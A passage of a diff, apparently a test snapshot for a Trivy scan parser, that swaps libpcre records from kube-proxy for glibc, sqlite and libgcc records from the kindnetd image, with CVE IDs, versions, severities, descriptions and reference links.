"type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-2", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-3", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-4", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1271", + "value": "https://ubuntu.com/security/CVE-2019-1010024", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/04/07/8", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "10.36-2+deb11u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1586", - "installedVersion": "10.36-2", - "packageName": "libpcre2-8-0", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010025", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/errata/RHSA-2022:5809", - "https://access.redhat.com/security/cve/CVE-2022-1586", - "https://bugzilla.redhat.com/2077976", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077976", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077976,", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1586", - "https://errata.almalinux.org/8/ALSA-2022-5809.html", - "https://errata.rockylinux.org/RLSA-2022:5809", - "https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a,", - "https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc388f89095b184ba6d99422cfc676c", - "https://linux.oracle.com/cve/CVE-2022-1586.html", - "https://linux.oracle.com/errata/ELSA-2022-5809.html", - "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1586", - "https://security.netapp.com/advisory/ntap-20221028-0009/", - "https://ubuntu.com/security/notices/USN-5627-1", - "https://ubuntu.com/security/notices/USN-5627-2", - "https://www.cve.org/CVERecord?id=CVE-2022-1586", + "https://access.redhat.com/security/cve/CVE-2019-1010025", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010025", + "https://www.cve.org/CVERecord?id=CVE-2019-1010025", ], }, "category": "Vulnerability", - "description": "An out-of-bounds read vulnerability was discovered in the PCRE2 library in the compile_xclass_matchingpath() function of the pcre2_jit_compile.c file. This involves a unicode property matching issue in JIT-compiled regular expressions. The issue occurs because the character was not fully read in case-less matching within JIT.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "pcre2: Out-of-bounds read in compile_xclass_matchingpath in pcre2_jit_compile.c", + "name": "glibc: information disclosure of heap addresses of pthread_created thread", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1586", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:5809", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1586", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2077976", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077976", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077976,", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1586", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2022-5809.html", + "value": "https://ubuntu.com/security/CVE-2019-1010025", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5809", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-19126", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-19126", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", + "https://linux.oracle.com/cve/CVE-2019-19126.html", + "https://linux.oracle.com/errata/ELSA-2020-3861.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", + "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", + "https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-19126", + ], + }, + "category": "Vulnerability", + "description": "On the x86-64 architecture, the GNU C Library (aka glibc) before 2.31 fails to ignore the LD_PREFER_MAP_32BIT_EXEC environment variable during program execution after a security transition, allowing local attackers to restrict the possible mapping addresses for loaded libraries and thus bypass ASLR for a setuid program.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: LD_PREFER_MAP_32BIT_EXEC not ignored in setuid binaries", + "references": [ { "type": "URL", - "value": "https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a,", + "value": "https://avd.aquasec.com/nvd/cve-2019-19126", }, { "type": "URL", - "value": "https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc388f89095b184ba6d99422cfc676c", + "value": "https://access.redhat.com/security/cve/CVE-2019-19126", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1586.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5809.html", + "value": "https://linux.oracle.com/cve/CVE-2019-19126.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", + "value": "https://linux.oracle.com/errata/ELSA-2020-3861.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4FQ5LC6JOYSOYFPRUZ4S45KL6IP3RPPZ/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFJ5E7NWOL6ROE5QVICHKIOUGCPFJVUH/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19126", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1586", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25204", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221028-0009/", + "value": "https://sourceware.org/ml/libc-alpha/2019-11/msg00649.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5627-1", + "value": "https://ubuntu.com/security/notices/USN-4416-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5627-2", + "value": "https://usn.ubuntu.com/4416-1/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1586", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-19126", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "10.36-2+deb11u1", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1587", - "installedVersion": "10.36-2", - "packageName": "libpcre2-8-0", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-9192", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-1587", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077983,", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1587", - "https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0", - "https://linux.oracle.com/cve/CVE-2022-1587.html", - "https://linux.oracle.com/errata/ELSA-2022-5251.html", - "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1587", - "https://security.netapp.com/advisory/ntap-20221028-0009/", - "https://ubuntu.com/security/notices/USN-5627-1", - "https://ubuntu.com/security/notices/USN-5627-2", - "https://www.cve.org/CVERecord?id=CVE-2022-1587", + "https://access.redhat.com/security/cve/CVE-2019-9192", + "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2019-9192", ], }, "category": "Vulnerability", - "description": "An out-of-bounds read vulnerability was discovered in the PCRE2 library in the get_recurse_data_length() function of the pcre2_jit_compile.c file. This issue affects recursions in JIT-compiled regular expressions caused by duplicate data transfers.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "pcre2: Out-of-bounds read in get_recurse_data_length in pcre2_jit_compile.c", + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1587", + "value": "https://avd.aquasec.com/nvd/cve-2019-9192", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1587", + "value": "https://access.redhat.com/security/cve/CVE-2019-9192", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077983,", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1587", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", }, { "type": "URL", - "value": "https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1587.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-27645", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-27645", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", + "https://linux.oracle.com/cve/CVE-2021-27645.html", + "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", + "https://security.gentoo.org/glsa/202107-07", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://www.cve.org/CVERecord?id=CVE-2021-27645", + ], + }, + "category": "Vulnerability", + "description": "The nameserver caching daemon (nscd) in the GNU C Library (aka glibc or libc6) 2.29 through 2.33, when processing a request for netgroup lookup, may crash due to a double-free, potentially resulting in degraded service or Denial of Service on the local system. This is related to netgroupcache.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: Use-after-free in addgetnetgrentX function in netgroupcache.c", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2021-27645", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5251.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-27645", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27645", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", + "value": "https://linux.oracle.com/cve/CVE-2021-27645.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", + "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1587", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221028-0009/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-27645", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5627-1", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5627-2", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27462", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1587", + "value": "https://ubuntu.com/security/notices/USN-5310-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-27645", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-11164", - "installedVersion": "2:8.39-13", - "packageName": "libpcre3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-8457", + "installedVersion": "5.3.28+dfsg1-0.5", + "packageName": "libdb5.3", "references": [ - "http://openwall.com/lists/oss-security/2017/07/11/3", - "http://www.openwall.com/lists/oss-security/2023/04/11/1", - "http://www.openwall.com/lists/oss-security/2023/04/12/1", - "http://www.securityfocus.com/bid/99575", - "https://access.redhat.com/security/cve/CVE-2017-11164", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", - "https://www.cve.org/CVERecord?id=CVE-2017-11164", + "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", + "https://access.redhat.com/security/cve/CVE-2019-8457", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", + "https://linux.oracle.com/cve/CVE-2019-8457.html", + "https://linux.oracle.com/errata/ELSA-2020-1810.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", + "https://security.netapp.com/advisory/ntap-20190606-0002/", + "https://ubuntu.com/security/notices/USN-4004-1", + "https://ubuntu.com/security/notices/USN-4004-2", + "https://ubuntu.com/security/notices/USN-4019-1", + "https://ubuntu.com/security/notices/USN-4019-2", + "https://usn.ubuntu.com/4004-1/", + "https://usn.ubuntu.com/4004-2/", + "https://usn.ubuntu.com/4019-1/", + "https://usn.ubuntu.com/4019-2/", + "https://www.cve.org/CVERecord?id=CVE-2019-8457", + "https://www.oracle.com/security-alerts/cpuapr2020.html", + "https://www.oracle.com/security-alerts/cpujan2020.html", + "https://www.oracle.com/security-alerts/cpujul2020.html", + "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", + "https://www.sqlite.org/releaselog/3_28_0.html", + "https://www.sqlite.org/src/info/90acdbfce9c08858", ], }, "category": "Vulnerability", - "description": "In PCRE 8.41, the OP_KETRMAX feature in the match function in pcre_exec.c allows stack exhaustion (uncontrolled recursion) when processing a crafted regular expression.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "SQLite3 from 3.6.0 to and including 3.27.2 is vulnerable to heap out-of-bound read in the rtreenode() function when handling invalid rtree tables.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "pcre: OP_KETRMAX feature in the match function in pcre_exec.c", + "name": "sqlite: heap out-of-bound read in function rtreenode()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-11164", - }, - { - "type": "URL", - "value": "http://openwall.com/lists/oss-security/2017/07/11/3", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/11/1", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/12/1", - }, - { - "type": "URL", - "value": "http://www.securityfocus.com/bid/99575", + "value": "https://avd.aquasec.com/nvd/cve-2019-8457", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-11164", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", + "value": "https://access.redhat.com/security/cve/CVE-2019-8457", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-11164", + "value": "https://linux.oracle.com/cve/CVE-2019-8457.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-16231", - "installedVersion": "2:8.39-13", - "packageName": "libpcre3", - "references": [ - "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", - "http://seclists.org/fulldisclosure/2018/Dec/33", - "http://www.openwall.com/lists/oss-security/2017/11/01/11", - "http://www.openwall.com/lists/oss-security/2017/11/01/3", - "http://www.openwall.com/lists/oss-security/2017/11/01/7", - "http://www.openwall.com/lists/oss-security/2017/11/01/8", - "http://www.securityfocus.com/bid/101688", - "https://access.redhat.com/security/cve/CVE-2017-16231", - "https://bugs.exim.org/show_bug.cgi?id=2047", - "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", - "https://www.cve.org/CVERecord?id=CVE-2017-16231", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** In PCRE 8.41, after compiling, a pcretest load test PoC produces a crash overflow in the function match() in pcre_exec.c because of a self-recursive call. NOTE: third parties dispute the relevance of this report, noting that there are options that can be used to limit the amount of stack that is used.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "pcre: self-recursive call in match() in pcre_exec.c leads to denial of service", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-16231", + "value": "https://linux.oracle.com/errata/ELSA-2020-1810.html", }, { "type": "URL", - "value": "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2018/Dec/33", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/11", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/3", + "value": "https://security.netapp.com/advisory/ntap-20190606-0002/", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/7", + "value": "https://ubuntu.com/security/notices/USN-4004-1", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2017/11/01/8", + "value": "https://ubuntu.com/security/notices/USN-4004-2", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/101688", + "value": "https://ubuntu.com/security/notices/USN-4019-1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-16231", + "value": "https://ubuntu.com/security/notices/USN-4019-2", }, { "type": "URL", - "value": "https://bugs.exim.org/show_bug.cgi?id=2047", + "value": "https://usn.ubuntu.com/4004-1/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", + "value": "https://usn.ubuntu.com/4004-2/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-16231", + "value": "https://usn.ubuntu.com/4019-1/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-7245", - "installedVersion": "2:8.39-13", - "packageName": "libpcre3", - "references": [ - "http://www.securityfocus.com/bid/97067", - "https://access.redhat.com/errata/RHSA-2018:2486", - "https://access.redhat.com/security/cve/CVE-2017-7245", - "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", - "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", - "https://security.gentoo.org/glsa/201710-25", - "https://www.cve.org/CVERecord?id=CVE-2017-7245", - ], - }, - "category": "Vulnerability", - "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 4) or possibly have unspecified other impact via a crafted file.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2017-7245", + "value": "https://usn.ubuntu.com/4019-2/", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/97067", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-8457", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2018:2486", + "value": "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2017-7245", + "value": "https://www.oracle.com/security-alerts/cpujan2020.html", }, { "type": "URL", - "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "value": "https://www.oracle.com/security-alerts/cpujul2020.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", + "value": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/201710-25", + "value": "https://www.sqlite.org/releaselog/3_28_0.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2017-7245", + "value": "https://www.sqlite.org/src/info/90acdbfce9c08858", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2017-7246", - "installedVersion": "2:8.39-13", - "packageName": "libpcre3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-12886", + "installedVersion": "1:8.3.0-6", + "packageName": "libgcc1", "references": [ - "http://www.securityfocus.com/bid/97067", - "https://access.redhat.com/errata/RHSA-2018:2486", - "https://access.redhat.com/security/cve/CVE-2017-7246", - "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", - "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", - "https://security.gentoo.org/glsa/201710-25", - "https://www.cve.org/CVERecord?id=CVE-2017-7246", + "https://access.redhat.com/security/cve/CVE-2018-12886", + "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", + "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", + 